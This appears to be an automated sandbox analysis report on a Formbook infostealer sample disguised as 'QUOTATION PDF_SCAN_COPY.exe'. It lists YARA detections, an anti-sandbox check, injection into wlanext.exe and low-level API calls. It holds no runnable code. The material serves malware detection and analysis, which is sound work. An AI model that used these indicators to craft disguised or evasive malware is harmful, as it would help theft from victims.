          Source: Yara matchFile source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2ae091c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2b961c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: QUOTATION PDF_SCAN_COPY.exe
          Source: initial sampleStatic PE information: Filename: QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2ae091c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTATION PDF_SCAN_COPY.exe.2b961c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_00774D5B1_2_00774D5B
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_0116E6B01_2_0116E6B0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_0116C2541_2_0116C254
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_0116E6A01_2_0116E6A0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0040103011_2_00401030
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041E0E311_2_0041E0E3
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041DABE11_2_0041DABE
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00402D9011_2_00402D90
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041E64011_2_0041E640
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00409E5011_2_00409E50
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041E61E11_2_0041E61E
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041D72211_2_0041D722
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00402FB011_2_00402FB0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_005A4D5B11_2_005A4D5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350AB4019_2_0350AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B2B2819_2_035B2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A03DA19_2_035A03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035ADBD219_2_035ADBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351EBB019_2_0351EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0359FA2B19_2_0359FA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B22AE19_2_035B22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034EF90019_2_034EF900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0350412019_2_03504120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035A100219_2_035A1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035BE82419_2_035BE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B28EC19_2_035B28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FB09019_2_034FB090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035120A019_2_035120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B20A819_2_035B20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035BDFCE19_2_035BDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B1FF119_2_035B1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AD61619_2_035AD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03506E3019_2_03506E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B2EF719_2_035B2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B1D5519_2_035B1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B2D0719_2_035B2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034E0D2019_2_034E0D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035B25DD19_2_035B25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034FD5E019_2_034FD5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0351258119_2_03512581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035AD46619_2_035AD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_034F841F19_2_034F841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328E0A119_2_0328E0A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328E0BA19_2_0328E0BA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328E0DB19_2_0328E0DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03272FB019_2_03272FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328E61E19_2_0328E61E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328E64019_2_0328E640
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03279E5019_2_03279E50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03272D9019_2_03272D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 034EB150 appears 48 times
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A350 NtCreateFile,11_2_0041A350
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A400 NtReadFile,11_2_0041A400
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A480 NtClose,11_2_0041A480
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A530 NtAllocateVirtualMemory,11_2_0041A530
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A34A NtCreateFile,11_2_0041A34A
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A484 NtClose,11_2_0041A484
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041A52D NtAllocateVirtualMemory,11_2_0041A52D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529A50 NtCreateFile,LdrInitializeThunk,19_2_03529A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_03529910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035299A0 NtCreateSection,LdrInitializeThunk,19_2_035299A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529840 NtDelayExecution,LdrInitializeThunk,19_2_03529840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529860 NtQuerySystemInformation,LdrInitializeThunk,19_2_03529860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529710 NtQueryInformationToken,LdrInitializeThunk,19_2_03529710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529FE0 NtCreateMutant,LdrInitializeThunk,19_2_03529FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529780 NtMapViewOfSection,LdrInitializeThunk,19_2_03529780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529650 NtQueryValueKey,LdrInitializeThunk,19_2_03529650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529660 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_03529660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035296D0 NtCreateKey,LdrInitializeThunk,19_2_035296D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035296E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_035296E0
